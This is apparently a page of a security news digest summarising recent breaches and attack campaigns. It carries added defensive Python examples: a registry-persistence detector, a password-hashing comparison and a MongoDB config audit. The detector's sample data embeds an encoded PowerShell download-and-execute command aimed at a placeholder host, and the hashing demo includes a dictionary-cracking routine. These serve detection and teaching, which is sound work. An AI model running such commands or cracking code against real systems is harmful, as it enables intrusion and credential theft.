ciso brief

All news in category “Incidents and Data Breaches”

2724 articles · page 55 of 137

Panera Bread breach affects 5.1M accounts, not 14M customers

🔒 Have I Been Pwned reports that a January 2026 data breach at Panera Bread exposed roughly 5.1 million unique email addresses and associated contact information, rather than the 14 million distinct customers initially claimed. The files, totaling about 760 MB, were published by the ShinyHunters extortion group after an alleged failed ransom attempt. ShinyHunters says it gained access using a Microsoft Entra SSO code obtained as part of a broader vishing campaign targeting SSO providers. Panera has confirmed the incident to authorities and says the exposed data consists of contact information.

Fancy Bear Exploits Microsoft Office CVE-2026-21509

🔒 CERT-UA reports that the Russian-linked group Fancy Bear exploited CVE-2026-21509 in Microsoft Office to target Ukrainian and EU organizations. Malicious Word documents fetched a disguised LNK file over WebDAV, which deployed a DLL and an image file carrying shellcode. The chain used COM hijacking and a scheduled task that restarts explorer.exe so that it loads a malicious EhStorShell.dll, ultimately launching the Covenant C2 framework. Microsoft has published updates and service-side mitigations; affected customers should apply the patches and the recommended registry changes.

Stealthy Windows RAT Enables Live Operator Conversations

🔒 Security researchers at Point Wild’s Lat61 team disclosed a Windows campaign that uses a multi-stage chain to establish persistent, memory-resident access and steal sensitive data. The attack starts with a small batch script that creates a per-user Registry Run key and launches a PowerShell loader which decodes Donut-generated shellcode and injects a heavily obfuscated .NET payload into memory. The modular Pulsar RAT supports live, interactive operator control alongside a parallel stealer, with stolen data exfiltrated as ZIP archives via Discord webhooks and Telegram bots.
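Both of the preceding items rely on per-user registry persistence that a defender can hunt for: the Pulsar loader's HKCU Run key launching an encoded PowerShell stage, and the Fancy Bear chain's COM hijack, which works because a CLSID registered under the user hive shadows the machine-wide entry and is loaded by explorer.exe on restart. The detector below is an added example, not code from either report or vendor; it assumes Sysmon Event ID 13 (registry value set) events flattened to a `Field=value|Field=value` line (a simplification of Sysmon's XML), and the sample events, the TEST-NET-2 address 198.51.100.7 and the CLSID are constructed placeholders.

```python
"""Flag two per-user registry persistence patterns in Sysmon-style registry
events: a Run key launching encoded PowerShell, and a user-hive COM hijack."""
import base64
import binascii
import re

# Run / RunOnce values in any hive
RUN_KEY_RE = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(?:Once)?\\", re.I)
# CLSID InprocServer32 registered in a user hive (HKCU or HKU\<SID>)
USER_COM_RE = re.compile(
    r"^(?:HKCU|HKU\\S-1-5-21-[\d-]+)\\Software\\Classes\\CLSID\\\{[0-9a-f-]+\}\\InprocServer32",
    re.I,
)
# -e, -ec, -enc, -EncodedCommand ... followed by a base64 blob
ENCODED_PS_RE = re.compile(r"(?:^|\s)-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)


def _encode_ps(command):
    """Encode a command the way -EncodedCommand expects (UTF-16LE, base64).
    Used only to build the constructed sample event below."""
    return base64.b64encode(command.encode("utf-16-le")).decode()


# Constructed sample events (assumed flattened Sysmon Event ID 13 layout).
SAMPLE_EVENTS = [
    r"EventID=13|Image=C:\Windows\System32\cmd.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Microsoft\Windows\CurrentVersion\Run\Updater"
    "|Details=powershell.exe -nop -w hidden -enc "
    + _encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.7/loader.ps1')"),
    r"EventID=13|Image=C:\Windows\System32\reg.exe"
    r"|TargetObject=HKU\S-1-5-21-1111-2222-3333-1001\Software\Classes\CLSID\{ABCDEF01-2345-6789-ABCD-EF0123456789}\InprocServer32\(Default)"
    r"|Details=C:\Users\alice\AppData\Roaming\EhStorShell.dll",
    r"EventID=13|Image=C:\Program Files\Vendor\setup.exe"
    r"|TargetObject=HKLM\Software\Microsoft\Windows\CurrentVersion\Run\VendorAgent"
    r"|Details=C:\Program Files\Vendor\agent.exe --tray",
    r"EventID=13|Image=C:\Windows\System32\regsvr32.exe"
    r"|TargetObject=HKLM\Software\Classes\CLSID\{ABCDEF01-2345-6789-ABCD-EF0123456789}\InprocServer32\(Default)"
    r"|Details=C:\Windows\System32\EhStorShell.dll",
]


def parse_event(line):
    """Split a flattened event into a field dict (first '=' separates key and value)."""
    fields = {}
    for part in line.split("|"):
        key, _, value = part.partition("=")
        fields[key.strip()] = value.strip()
    return fields


def decode_powershell(blob):
    """Decode an -EncodedCommand argument; None if it is not valid base64."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le", errors="replace")
    except (binascii.Error, ValueError):
        return None


def analyze_event(fields):
    """Return a finding dict for a suspicious registry write, else None."""
    target = fields.get("TargetObject", "")
    details = fields.get("Details", "")
    # 1. Run/RunOnce value whose data launches PowerShell with an encoded command
    if RUN_KEY_RE.search(target) and "powershell" in details.lower():
        match = ENCODED_PS_RE.search(details)
        if match:
            return {"rule": "run_key_encoded_powershell", "target": target,
                    "decoded": decode_powershell(match.group(1))}
    # 2. User-hive CLSID InprocServer32 pointing outside System32: the HKCU entry
    #    shadows HKLM, so explorer.exe loads the attacker's DLL on next start.
    if USER_COM_RE.match(target) and not details.lower().startswith("c:\\windows\\system32\\"):
        return {"rule": "hkcu_com_hijack", "target": target, "dll": details}
    return None


def analyze_events(lines):
    """Run every line through the detector and keep the findings."""
    return [f for f in (analyze_event(parse_event(line)) for line in lines) if f]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding)
```

The third and fourth sample events are the benign controls: a machine-wide Run value pointing at a plain executable and a System32 DLL registered under HKLM produce no finding, so the detector keys on the combination of user hive plus suspicious data rather than on the key path alone. In production the decoded command is what you triage, since `-w hidden -enc` by itself is also used by some legitimate agents.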

AI Coding Assistants Secretly Exfiltrate Developers' Code

⚠️ A new report alleges that two popular AI coding assistants, together used by roughly 1.5 million developers, are quietly copying everything they ingest to servers in China. Security researchers say the extensions capture editor content, code snippets, and related telemetry without clear user disclosure, and that the behavior appears systematic and persistent rather than incidental. Until the vendors provide transparent remediation, developers and organizations should avoid unvetted extensions and perform immediate audits and containment.

Android RAT Abuses Hugging Face to Host Malware Campaign

🔒 A new Android remote access trojan (RAT) leverages the AI hosting platform Hugging Face to store and deliver malicious APK payloads, researchers at Bitdefender report. The campaign distributes a dropper app called TrustBastion that uses fake update dialogs to trick users into downloading an updater which redirects to repositories hosting polymorphic RAT APKs. Operators made frequent commits and shifted repositories to avoid takedowns, while the malware requests Accessibility and screen-recording permissions to capture credentials and relay data to command-and-control servers.

NationStates Confirms Data Breach, Temporarily Shuts Site

🔒 NationStates has confirmed a data breach after taking its browser-based game offline following a player-reported vulnerability that resulted in remote code execution on the production server. The attacker exploited a double-parsing and input sanitization flaw in the Dispatch Search feature to copy application code and user data, including email addresses, MD5 password hashes, login IP addresses, and browser User-Agent strings. NationStates says the contents of telegrams (in-game messages) were likely partially exposed, is wiping and rebuilding the production environment, has reported the incident to authorities, and expects service to be restored within two to five days.
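The MD5 password hashes are the part of this dump that keeps hurting after the rebuild: an unsalted, fast hash can be reversed for common passwords with one precomputed table, and identical digests expose which users share a password, so credential-stuffing against other sites follows. The script below is an added example, not NationStates code, using only the standard library; the wordlist and user records are constructed, and PBKDF2-HMAC-SHA256 with 600,000 iterations stands in for the slow, salted KDF (Argon2id or bcrypt are the usual choices) that a rebuilt site should store instead.

```python
"""Unsalted MD5 versus a salted slow KDF, on constructed breach-style data."""
import hashlib
import hmac
import os

# Constructed stand-in for a common-password list; real cracking runs lists
# of hundreds of millions of entries on GPUs computing billions of MD5/s.
WORDLIST = ["123456", "password", "qwerty", "letmein", "dragon", "nationstates"]


def md5_hash(password):
    """How the breached site stored passwords: no salt, one fast hash."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_md5(digest, wordlist=WORDLIST):
    """Dictionary attack: one lookup table, built once, cracks every user."""
    table = {md5_hash(word): word for word in wordlist}
    return table.get(digest)


def reused_password_groups(user_hashes):
    """Without salt, equal digests mean equal passwords across accounts."""
    groups = {}
    for user, digest in user_hashes.items():
        groups.setdefault(digest, []).append(user)
    return [users for users in groups.values() if len(users) > 1]


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted PBKDF2-HMAC-SHA256; a per-user random salt defeats the shared table."""
    salt = salt if salt is not None else os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_pbkdf2(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    _, iterations, salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


def crack_pbkdf2(stored, wordlist=WORDLIST):
    """Each guess costs a full KDF run per user; nothing can be precomputed."""
    for word in wordlist:
        if verify_pbkdf2(word, stored):
            return word
    return None


if __name__ == "__main__":
    # Constructed leaked records, one of which is shared between two users
    leaked = {"alice": md5_hash("letmein"), "bob": md5_hash("letmein"), "carol": md5_hash("dragon")}
    for user, digest in leaked.items():
        print(user, digest, "->", crack_md5(digest))
    print("accounts sharing a password:", reused_password_groups(leaked))
    stored = pbkdf2_hash("letmein")
    print(stored)
    print("verify:", verify_pbkdf2("letmein", stored), verify_pbkdf2("wrong", stored))
```

Run it and the three MD5 digests fall instantly, alice and bob are grouped as sharing a password, while two PBKDF2 hashes of the same password differ and each guess against them costs 600,000 HMAC rounds. For users of the breached site, the practical consequence is that the password should be treated as public and changed everywhere it was reused.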

Former Google Engineer Guilty of Stealing AI Secrets

🔒 A former Google engineer, Linwei Ding, was convicted by a US federal jury on 14 counts, including economic espionage and theft of trade secrets, after allegedly exfiltrating over 2,000 pages of sensitive AI technical documents. Prosecutors say he copied data into Apple Notes, converted it to PDFs, and uploaded the materials to a personal Google Cloud account to evade DLP controls. The stolen IP involved custom TPU and GPU orchestration software and SmartNIC designs intended for AI supercomputers, and the DoJ alleges Ding planned to support Chinese state-affiliated entities.

Notepad++ Update System Hijacked via Hosting Compromise

🔐 The maintainer of Notepad++ disclosed that state-sponsored actors compromised the app’s update delivery by hijacking infrastructure at the hosting-provider level and redirecting update traffic to malicious servers. A weakness in the WinGUp updater’s verification logic allowed the redirected download to deliver poisoned executables that the updater accepted. In response, the site has been migrated to a new host and the investigation is ongoing.

eScan Antivirus Update Servers Compromised, Deliver Malware

⚠ MicroWorld Technologies confirmed that unknown attackers compromised the update infrastructure for its eScan antivirus and pushed a malicious update that deployed a multi-stage downloader to enterprise and consumer endpoints. The rogue update replaced the legitimate reload.exe with a binary carrying an invalid signature; it runs three Base64-encoded PowerShell stages, includes an AMSI bypass and blocks automatic remediation. Kaspersky and Morphisec report hundreds of attempted infections, mainly in India and neighboring countries. MicroWorld isolated the affected update servers for hours and released a remediation package; impacted customers should contact the vendor for the fix.

Open VSX Supply Chain Attack Leveraged Dev Account

🛡️ On January 30, 2026, threat actors used a compromised developer account to publish malicious updates to four Open VSX extensions, embedding the GlassWorm loader. The extensions, previously legitimate utilities with over 22,000 combined downloads, were removed after discovery. The loader decrypts and executes payloads at runtime, using EtherHiding and Solana memos for C2 rotation, and targets macOS credentials and cryptocurrency wallets.

Exposed MongoDB Instances Targeted in Extortion Campaign

🔒 A threat actor is automating data-extortion attacks against publicly exposed MongoDB instances, compromising roughly 1,400 servers and leaving ransom notes demanding about 0.005 BTC (~$500). Researchers at Flare found over 208,500 publicly reachable MongoDB servers, with 3,100 allowing access without authentication and nearly half of those already wiped. There is no guarantee that paying ransoms will restore data or provide working keys. Victims are urged to avoid public exposure, enforce strong authentication, apply network controls, and keep instances updated.
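The exposure this campaign automates is a configuration state, not a software bug: `mongod` listening on every interface with `security.authorization` left off. The audit below is an added example, not code from Flare or MongoDB; it parses the nested `key: value` subset of YAML that mongod.conf uses (no lists or anchors, an assumption of the example) and reports the weak settings. Both configurations are constructed, the `10.0.0.5` address and `/etc/ssl/mongodb.pem` path are placeholders, and the default-bind behaviour it assumes is that mongod 3.6 and later bind to localhost when `bindIp` is absent.

```python
"""Audit a mongod.conf for the exposure the extortion campaign relies on:
a listener on all interfaces with access control disabled."""

# Constructed: the weak configuration the ransom-note victims typically run ...
WEAK_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 0.0.0.0
"""

# ... and a hardened counterpart: localhost plus one app-server address,
# authorization on, TLS required (placeholder address and certificate path).
HARDENED_CONF = """\
storage:
  dbPath: /var/lib/mongodb
net:
  port: 27017
  bindIp: 127.0.0.1,10.0.0.5
  tls:
    mode: requireTLS
    certificateKeyFile: /etc/ssl/mongodb.pem
security:
  authorization: enabled
"""


def parse_mongod_conf(text):
    """Parse the nested 'key: value' YAML subset mongod.conf uses into dicts."""
    root = {}
    stack = [(-1, root)]                      # (indent, mapping being filled)
    for raw in text.splitlines():
        if not raw.strip() or raw.lstrip().startswith("#"):
            continue
        indent = len(raw) - len(raw.lstrip())
        key, _, value = raw.strip().partition(":")
        while indent <= stack[-1][0]:         # a dedent closes open sections
            stack.pop()
        parent = stack[-1][1]
        if value.strip():
            parent[key.strip()] = value.strip()
        else:
            parent[key.strip()] = child = {}
            stack.append((indent, child))
    return root


def audit_mongod(conf):
    """Return findings, most severe first; an empty list means nothing flagged."""
    net = conf.get("net", {})
    security = conf.get("security", {})
    bind = net.get("bindIp", "127.0.0.1")     # assumed default: localhost only
    bind_all = (net.get("bindIpAll", "false").lower() == "true"
                or any(ip.strip() in ("0.0.0.0", "::") for ip in bind.split(",")))
    auth_on = security.get("authorization", "disabled").lower() == "enabled"
    findings = []
    if bind_all and not auth_on:
        findings.append("CRITICAL: bound to all interfaces with authorization disabled; "
                        "anyone who reaches the port can read and drop every database")
    elif bind_all:
        findings.append("HIGH: bound to all interfaces; restrict bindIp and firewall the port")
    elif not auth_on:
        findings.append("MEDIUM: authorization disabled; any local process has full access")
    if net.get("tls", {}).get("mode", "disabled") != "requireTLS":
        findings.append("LOW: TLS not required; credentials and data cross the wire in clear")
    return findings


if __name__ == "__main__":
    for name, text in (("weak", WEAK_CONF), ("hardened", HARDENED_CONF)):
        print(name, audit_mongod(parse_mongod_conf(text)) or ["ok"])
```

Enabling `authorization` on a live instance only helps once an administrative user exists in the `admin` database, so the order of operations is: create the admin user, enable authorization, restart, then narrow `bindIp` and add the firewall rule; and because this actor wipes the data rather than encrypting it, the only recovery path is a backup taken before the exposure.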

Former Google Engineer Convicted for Stealing AI Data

🔒 A U.S. jury has convicted Linwei Ding, a former software engineer at Google, for stealing confidential AI supercomputer information and covertly sharing it with China-based technology firms. Prosecutors say Ding exfiltrated more than 2,000 pages of proprietary material — including details about TPU and GPU systems, orchestration software, and SmartNIC networking — by uploading files to his personal cloud account between May 2022 and April 2023. He later founded Shanghai Zhisuan Technology Co., sought government talent programs, and was convicted on multiple counts of economic espionage and trade secret theft after an 11-day San Francisco trial.

Large-scale cloud storage payment scam floods inboxes

⚠️ Over recent months a global scam campaign has bombarded users with fraudulent cloud-storage renewal notices claiming payment failures and imminent deletion of photos and backups. The emails use auto-generated sender domains and links hosted on Google Cloud Storage that redirect to phishing pages impersonating cloud portals. Those pages run fake storage scans, promote unrelated affiliate products, and lead to checkout forms that collect credit card details. Delete these messages and verify billing only through official apps or websites.

Mandiant: ShinyHunters Exploit SSO and Vishing Campaigns

🔒 Mandiant reports a recent wave of ShinyHunters attacks that combine targeted vishing and company‑branded phishing sites to capture SSO credentials and MFA codes. Attackers impersonate IT or helpdesk staff, guide victims through MFA approval or one‑time passcodes in real time, and enroll attacker-controlled MFA devices. With access to Okta, Microsoft Entra, or Google SSO dashboards they pivot into SaaS platforms (Salesforce, Microsoft 365, SharePoint, DocuSign, Slack, Atlassian, Dropbox, Google Drive) to steal and extort cloud data.

Researcher Shows Private Instagram Profiles Leaking

🔍 A security researcher published evidence that some Instagram private profiles returned links to user photos and captions inside the page HTML, making them visible to unauthenticated visitors on certain mobile devices. Researcher Jatin Banga showed the polaris_timeline_connection JSON object embedded encoded CDN links pointing to images that should have been private. In tests of private accounts he controlled or had permission to use, about 28% exposed captions and CDN links. Banga reported the issue to Meta on October 12, 2025; Meta later closed the report as "not applicable" and did not provide a root-cause analysis, though the behavior ceased roughly October 16.

RedKitten: Iran-linked campaign targets activists and NGOs

🔍 HarfangLab detected a Farsi-speaking, Iran-aligned campaign codenamed RedKitten in January 2026 that targets NGOs and individuals documenting recent human rights abuses. The operation begins with a Farsi-named 7‑Zip archive containing macro-laced Excel files; embedded VBA macros, which analysts say show signs of LLM generation, drop a C# implant via AppDomainManager injection. The backdoor, SloppyMIO, uses GitHub and Google Drive for steganographic configuration retrieval and leverages Telegram for command-and-control, supporting multiple modules to run commands, collect and exfiltrate files, deploy payloads and establish persistence.

FBI Seizes RAMP Ransomware Forum, Disrupting Network

🔒 The FBI has seized control of RAMP (Russian Anonymous MarketPlace), replacing both its dark‑web and clearnet domains with law‑enforcement seizure banners. The action, carried out with the US Attorney’s Office for the Southern District of Florida and the Justice Department’s CCIPS, redirects the forum's nameservers to ns1.fbi.seized.gov and ns2.fbi.seized.gov. The takedown follows the 2024 arrest of alleged operator Mikhail Matveev and may provide authorities access to user data that could prompt further prosecutions.

Mandiant: Vishing Campaign Steals MFA to Breach SaaS

📞 Google-owned Mandiant reported an expansion of ShinyHunters-style extortion activity that combines advanced voice phishing with fake credential-harvesting sites to capture SSO credentials and MFA codes to access cloud SaaS environments. The team is tracking multiple clusters (UNC6661, UNC6671, UNC6240) and observed attackers impersonating IT staff, registering attacker-controlled MFA devices, and exfiltrating data from services such as SharePoint and OneDrive. Mandiant recommends strengthening help-desk verification, improving logging and detection, restricting weak authentication methods, and adopting phishing-resistant options like FIDO2 or passkeys.

Poland Attributes December Cyber Attacks to Static Tundra

🔒 CERT Polska disclosed coordinated, destructive cyber attacks on December 29, 2025 that targeted more than 30 wind and photovoltaic farms, a manufacturing firm, and a large combined heat and power (CHP) plant. The agency attributed the activity to the cluster it calls Static Tundra, linked to Russia's FSB Center 16, while other vendors noted similarities to Sandworm. Attackers deployed multiple wipers — notably DynoWiper and a PowerShell-based LazyWiper — exploited vulnerable FortiGate appliances, harvested credentials and exfiltrated selected M365 data, but did not succeed in disrupting electricity production or heat delivery.

Operation Switch Off: Major IPTV Services Dismantled

🔒 A coordinated international law enforcement operation led by Italy’s District Prosecutor’s Office of Catania, with support from Europol, Eurojust and Interpol, dismantled three large illegal IPTV platforms. Authorities seized infrastructure linked to IPTVItalia, migliorIPTV and DarkTV, identified 31 suspects and disrupted servers across Romania and Africa. Investigators report the services illegally retransmitted content from providers such as Sky, DAZN, Netflix and others while using cryptocurrencies and shell companies to obscure proceeds.